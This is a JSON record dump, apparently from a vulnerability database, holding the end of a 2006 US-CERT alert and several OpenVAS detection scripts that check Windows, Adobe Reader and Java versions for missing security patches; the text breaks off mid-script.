     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>

   * CVE-2006-0012 -
     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0012>

   * Microsoft Update - <https://update.microsoft.com/microsoftupdate>

   * Securing Your Web Browser -
     <http://www.us-cert.gov/reading_room/securing_browser/#Internet_Ex
plorer>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA06-101A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA06-101A Feedback VU#876678" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2006 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n Apr 11, 2006: Initial release\r\n\r\n", "edition": 1, "modified": "2006-04-12T00:00:00", "published": "2006-04-12T00:00:00", "id": "SECURITYVULNS:DOC:12171", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12171", "title": "US-CERT Technical Cyber Security Alert TA06-101A -- Microsoft Windows and Internet Explorer Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": 
"2020-04-27T19:23:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1885"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-042.", "modified": "2020-04-23T00:00:00", "published": "2010-07-14T00:00:00", "id": "OPENVAS:1361412562310902080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902080", "type": "openvas", "title": "Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902080\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-07-14 10:07:03 +0200 (Wed, 14 Jul 2010)\");\n script_bugtraq_id(40725);\n script_cve_id(\"CVE-2010-1885\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/59267\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1417\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-042\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to inject malicious code\n in the Help and Support Center and execute arbitrary commands on a vulnerable\n system by tricking a user into visiting a specially crafted web page.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2003 Service Pack 2 and prior\");\n script_tag(name:\"insight\", value:\"The flaw is due to 
the error in 'MPC::HTML::UrlUnescapeW()' function\n within the Help and Support Center application (helpctr.exe) that does not\n properly check the return code of 'MPC::HexToNum()' when escaping URLs.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-042.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"2229593\") == 0){\n exit(0);\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\COM3\\Setup\",\n item:\"Install Path\");\nif(!sysPath){\n exit(0);\n}\n\nsysPath = sysPath - \"\\system32\" + \"\\pchealth\\helpctr\\binaries\\helpsvc.exe\";\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:sysPath);\n\nsysVer = GetVer(file:file, share:share);\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.3720\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.1.2600.3720\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.5997\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.1.2600.5997\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be 
vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4726\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.2.3790.4726\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1885"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-042.", "modified": "2017-02-20T00:00:00", "published": "2010-07-14T00:00:00", "id": "OPENVAS:902080", "href": "http://plugins.openvas.org/nasl.php?oid=902080", "type": "openvas", "title": "Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-042.nasl 5361 2017-02-20 11:57:13Z cfi $\n#\n# Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to inject malicious code\n in the Help and Support Center and execute arbitrary commands on a vulnerable\n system by tricking a user into visiting a specially crafted web page.\n Impact Level: System\";\ntag_affected = \"Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2003 Service Pack 2 and prior.\";\ntag_insight = \"The flaw is due to the error in 'MPC::HTML::UrlUnescapeW()' function\n within the Help and Support Center application (helpctr.exe) that does not\n properly check the return code of 'MPC::HexToNum()' when escaping URLs.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/Bulletin/MS10-042.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-042.\";\n\nif(description)\n{\n script_id(902080);\n script_version(\"$Revision: 5361 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:57:13 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-14 10:07:03 +0200 (Wed, 14 Jul 2010)\");\n script_bugtraq_id(40725);\n script_cve_id(\"CVE-2010-1885\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/59267\");\n script_xref(name : 
\"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1417\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/Bulletin/MS10-042.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3) <= 0){\n exit(0);\n}\n\n# Check for MS10-042 Hotfix\nif(hotfix_missing(name:\"2229593\") == 0){\n exit(0);\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\COM3\\Setup\",\n item:\"Install Path\");\nif(!sysPath){\n exit(0);\n}\n\nsysPath = sysPath - \"\\system32\" + \"\\pchealth\\helpctr\\binaries\\helpsvc.exe\";\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:sysPath);\n\nsysVer = GetVer(file:file, share:share);\nif(!sysVer){\n exit(0);\n}\n\n# Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for helpsvc.exe version < 5.1.2600.3720\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.3720\")){\n security_message(0);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n # Grep for helpsvc.exe version < 5.1.2600.5997\n 
if(version_is_less(version:sysVer, test_version:\"5.1.2600.5997\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for helpsvc.exe version < 5.2.3790.4726\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4726\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-20T08:49:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2265", "CVE-2010-1885"], "description": "This host is prone to remote code execution vulnerability.", "modified": "2017-07-05T00:00:00", "published": "2010-06-11T00:00:00", "id": "OPENVAS:801358", "href": "http://plugins.openvas.org/nasl.php?oid=801358", "type": "openvas", "title": "MS Windows Help and Support Center Remote Code Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_windows_help_n_support_center_code_exec_vuln.nasl 6529 2017-07-05 06:05:51Z cfischer $\n#\n# MS Windows Help and Support Center Remote Code Execution Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2010-06-16\n# Updated CVSS score, Description, References and added the CVE-2010-2265\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2011-05-18\n# -This plugin is invalidated by secpod_ms10-042.nasl \n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n\ntag_solution = \"Vendor has released a patch for the issue, refer below link for\npatch. http://www.microsoft.com/technet/security/bulletin/ms10-042.mspx \";\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute\narbitrary code or compromise a vulnerable system.\n\nImpact Level: System\";\n\ntag_affected = \"Windows XP Service Pack 2/3 Windows Server 2003 Service Pack 2.\";\n\ntag_insight = \"The flaws are due to:\n- An error in the 'MPC::HTML::UrlUnescapeW()' function within the Help and\nSupport Center application (helpctr.exe) that does not properly check the\nreturn code of 'MPC::HexToNum()' when escaping URLs, which could allow\nattackers to bypass whitelist restrictions and invoke arbitrary help files.\n- An input validation error in the 'GetServerName()' function in the\n'C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\sysinfo\\commonFunc.js' script invoked via\n'ShowServerName()' in 'C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\sysinfo\\sysinfomain.htm',\nwhich could be exploited by attackers to execute arbitrary scripting code.\";\n\ntag_summary = \"This host is prone to remote code execution vulnerability.\";\n\nif(description)\n{\n script_id(801358);\n script_version(\"$Revision: 6529 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 08:05:51 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 14:27:58 +0200 (Fri, 11 Jun 2010)\");\n script_cve_id(\"CVE-2010-1885\", \"CVE-2010-2265\"); \n 
script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"MS Windows Help and Support Center Remote Code Execution Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/59267\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1417\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/advisory/2219475.mspx\");\n \n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\n## This plugin is invalidated by secpod_ms10-042.nasl \nexit(66);\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2003:3) <= 0){\n exit(0);\n}\n\nif(registry_key_exists(key:\"SOFTWARE\\Classes\\HCP\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-11T15:23:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2265", "CVE-2010-1885"], "description": "This host is prone to remote code execution vulnerability.\n\n This VT has been replaced by ", "modified": "2020-06-10T00:00:00", "published": "2010-06-11T00:00:00", "id": "OPENVAS:1361412562310801358", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310801358", "type": "openvas", "title": "MS Windows Help and Support Center Remote Code Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MS Windows Help and Support Center Remote Code Execution Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2010-06-16\n# Updated CVSS score, Description, References and added the CVE-2010-2265\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2011-05-18\n# -This plugin is invalidated by secpod_ms10-042.nasl\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801358\");\n script_version(\"2020-06-10T11:35:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-10 11:35:03 +0000 (Wed, 10 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 14:27:58 +0200 (Fri, 11 Jun 2010)\");\n script_cve_id(\"CVE-2010-1885\", \"CVE-2010-2265\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"MS Windows Help and Support Center Remote Code Execution Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/59267\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1417\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2010/2219475\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-042\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code or compromise a vulnerable system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP Service Pack 2/3\n\n - Microsoft Windows Server 2003 Service Pack 2\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - An error in the 'MPC::HTML::UrlUnescapeW()' function within the Help and\n Support Center application (helpctr.exe) that does not properly check the\n 
return code of 'MPC::HexToNum()' when escaping URLs, which could allow\n attackers to bypass whitelist restrictions and invoke arbitrary help files.\n\n - An input validation error in the 'GetServerName()' function in the\n 'C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\sysinfo\\commonFunc.js' script invoked via\n 'ShowServerName()' in 'C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\sysinfo\\sysinfomain.htm',\n which could be exploited by attackers to execute arbitrary scripting code.\");\n\n script_tag(name:\"summary\", value:\"This host is prone to remote code execution vulnerability.\n\n This VT has been replaced by 'Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)' (OID: 1.3.6.1.4.1.25623.1.0.902080)\");\n\n script_tag(name:\"solution\", value:\"Vendor has released a patch for the issue. Please see the references\n for more information.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66); # This plugin is invalidated by secpod_ms10-042.nasl\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0658", "CVE-2009-0927"], "description": "This host has Adobe Reader installed, and is prone to buffer overflow\nvulnerability.", "modified": "2019-04-29T00:00:00", "published": "2009-03-03T00:00:00", "id": "OPENVAS:1361412562310900321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900321", "type": "openvas", "title": "Buffer Overflow Vulnerability in Adobe Reader (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Buffer Overflow Vulnerability in Adobe Reader (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900321\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_cve_id(\"CVE-2009-0658\", \"CVE-2009-0927\");\n script_bugtraq_id(33751, 34169, 34229);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-03-03 06:56:37 +0100 (Tue, 03 Mar 2009)\");\n script_name(\"Buffer Overflow Vulnerability in Adobe Reader (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host has Adobe Reader installed, and is prone to buffer overflow\nvulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This issue is due to error in array indexing while processing JBIG2 streams\nand unspecified vulnerability related to a JavaScript method.\");\n script_tag(name:\"impact\", value:\"This can be exploited to corrupt arbitrary memory via a specially crafted PDF\nfile, related to a non-JavaScript function call and to execute arbitrary code\nin 
context of the affected application.\");\n script_tag(name:\"affected\", value:\"Adobe Reader version 9.x < 9.1, 8.x < 8.1.4, 7.x < 7.1.1 on Linux\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.1 or 8.1.4 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33901\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-03.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-04.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa09-01.html\");\n script_xref(name:\"URL\", value:\"http://downloads.securityfocus.com/vulnerabilities/exploits/33751-PoC.pl\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Unix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE))\n exit(0);\n\nif(readerVer =~ \"^[7-9]\\.\")\n{\n if(version_in_range(version:readerVer, test_version:\"7.0\", test_version2:\"7.1.0\")||\n version_in_range(version:readerVer, test_version:\"8.0\", test_version2:\"8.1.3\")||\n readerVer =~ \"^9\\.0\")\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-27T19:23:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "description": "This host is installed with Sun Java Deployment Toolkit and is prone 
to\n multiple vulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2010-04-23T00:00:00", "id": "OPENVAS:1361412562310902168", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902168", "type": "openvas", "title": "Sun Java JRE Multiple Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Sun Java JRE Multiple Vulnerabilities (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902168\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-04-23 17:57:39 +0200 (Fri, 23 Apr 2010)\");\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39492);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Sun Java JRE Multiple Vulnerabilities (Linux)\");\n\n script_tag(name:\"qod_type\", 
value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/Java/JRE/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows execution of arbitrary code by tricking a user\n into visiting a malicious web page.\");\n script_tag(name:\"affected\", value:\"Sun Java version 6 Update 19 and prior on Linux.\");\n script_tag(name:\"insight\", value:\"The flaws are due to an input validation error in 'JRE' that does not\n properly validate arguments supplied via 'javaw.exe' before being passed to\n a 'CreateProcessA' call, which could allow remote attackers to automatically\n download and execute a malicious JAR file hosted on a network.\");\n script_tag(name:\"solution\", value:\"Upgrade to Sun Java version 6 Update 20.\");\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/886582\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0853\");\n script_xref(name:\"URL\", value:\"http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html\");\n script_xref(name:\"URL\", value:\"http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\njreVer = get_app_version(cpe:\"cpe:/a:sun:jre\");\nif(jreVer)\n{\n if(version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.19\")){\n report = report_fixed_ver(installed_version:jreVer, vulnerable_range:\"1.6 - 1.6.0.19\");\n security_message(port: 0, data: report);\n 
